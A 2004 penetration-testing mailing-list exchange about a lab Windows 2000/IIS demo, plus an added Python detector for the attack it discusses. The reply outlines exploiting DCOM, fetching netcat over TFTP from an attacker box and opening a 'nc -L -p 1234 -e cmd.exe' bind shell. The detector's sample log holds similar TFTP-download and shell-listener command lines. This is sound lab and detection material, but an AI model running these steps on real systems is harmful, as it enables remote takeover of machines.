Re: Hacking Demo and Test Lab

From: Martin Wasson (martin_wasson_at_mastercard.com)
Date: 06/11/04

    To: raza sharif <raza@raza.demon.co.uk>
    Date: Fri, 11 Jun 2004 10:33:26 -0500
    
    

    Raza,
    A few things. I wouldn't really call this advanced. Why are you hacking
    from XP instead of Linux? Get yourself a Linux box. These exploits of
    which you write do not spawn shells using netcat. Netcat can bind shells
    after you install it. You have to pop the Win2k box first, with something
    like oc192-dcom.c. This exploit will get you a shell, then have it GET
    (tftp) the files (like netcat) from your Linux box. Once the win2k box has
    received nc.exe, run "nc -L -p 1234 -e cmd.exe" AFTER you've started netcat
    on your Linux box (nc <win2k IP> 1234).

    Does that help?

    Regards,

    Marty Wasson, CISSP, CEH, IAM
    Sr. Information Security Analyst
    Global Information Security
    MasterCard International
    (636) 722-2372
    martin_wasson@mastercard.com

    "Men occasionally stumble over the truth, but most of them pick themselves
    up and hurry off as if nothing ever happened." Winston Churchill

    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    CONFIDENTIALITY NOTICE
    This E-mail message and any documents which accompany it are intended only
    for the use of the individual or entity to which addressed, and may contain
    information that is privileged, confidential or exempt from disclosure
    under applicable law. If the reader is not the intended recipient, any
    disclosure, distribution or other use of this E-mail message is prohibited.
    If you have received this E-mail message in error, please notify the sender
    immediately. Thank you.
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

                                                                                                                                           
    From: raza sharif <raza@raza.demon.co.uk>
    To: pen-test@securityfocus.com
    cc: (bcc: Martin Wasson/STL/MASTERCARD)
    Subject: Hacking Demo and Test Lab
    Date: 06/11/2004 06:41 AM
                                                                                                                                           
                                                                                                                                           

    Hi Folks,

    I'm doing some advanced hacking demos for management and also corporates
    etc.

    I have an installed Windows 2000 Server and IIS 5.0 on VMware GSX Server.

    I'm using WebDAV and other exploits that all basically should spawn a shell
    using netcat.

    I'm using XP as my attacking machine.

    Problem at the moment is netcat will not spawn a shell regardless of what I
    try.

    Any ideas? I checked the install; it is Windows 2000 500.1295, no reference
    to service packs etc. It's a default install.

    Also, what are good demos etc. to run to show real hacking on Windows 2000,
    IIS etc. that I can get to work?

    thanks

    Raza

    Raza@raza.demon.co.uk

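
A defender's view of the sequence described in the reply above, as an added example that is not part of the original thread: a small Python detector over simplified process-creation records that flags a TFTP client fetching an executable and any binary started with listen, port and `-e cmd.exe` options, and links the two when they occur on the same host. The record format, host names, addresses and rule names are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the thread): timestamp|host|command line
SAMPLE_EVENTS = """\
2004-06-11T10:01:02|W2K-LAB|cmd.exe /c dir c:\\inetpub
2004-06-11T10:01:40|W2K-LAB|tftp -i 192.0.2.10 GET nc.exe
2004-06-11T10:02:05|W2K-LAB|nc -L -p 1234 -e cmd.exe
2004-06-11T10:05:00|W2K-FILE|tftp -i 192.0.2.20 PUT report.txt
2004-06-11T11:30:00|W2K-FILE|svch0st.exe -l -p 4444 -e cmd.exe
"""
SHELLS = {"cmd", "cmd.exe"}
EXEC_EXT = (".exe", ".dll", ".bat", ".cmd")

def tftp_download(argv):
    """Return the file name if argv is a TFTP client GET of an executable."""
    if argv[0].lower() not in ("tftp", "tftp.exe"):
        return None
    upper = [a.upper() for a in argv]
    if "GET" not in upper[:-1]:  # GET must be followed by a source file name
        return None
    name = argv[upper.index("GET") + 1].lower()
    return name if name.endswith(EXEC_EXT) else None

def shell_listener(argv):
    """True if any binary, whatever its name, gets listen + port + '-e <shell>'."""
    flags = [a.lower() for a in argv[1:]]  # lowercasing covers both -l and -L
    runs_shell = any(f == "-e" and nxt in SHELLS for f, nxt in zip(flags, flags[1:]))
    return "-l" in flags and "-p" in flags and runs_shell

def detect(log_text, window=timedelta(minutes=10)):
    alerts, fetched = [], {}  # fetched: (host, file stem) -> time of the TFTP GET
    for line in filter(None, log_text.splitlines()):
        ts, host, cmdline = line.split("|", 2)
        ts, argv = datetime.fromisoformat(ts), cmdline.split()
        if not argv:
            continue
        stem = argv[0].lower().rsplit(".", 1)[0]
        name = tftp_download(argv)
        if name:
            fetched[(host, name.rsplit(".", 1)[0])] = ts
            alerts.append((host, "tftp-exe-download", name))
        elif shell_listener(argv):
            seen = fetched.get((host, stem))
            chained = seen is not None and timedelta(0) <= ts - seen <= window
            rule = "shell-listener-after-tftp" if chained else "shell-listener"
            alerts.append((host, rule, argv[0]))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Matching on the option pattern rather than the binary name is what catches the renamed copy in the last sample record.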

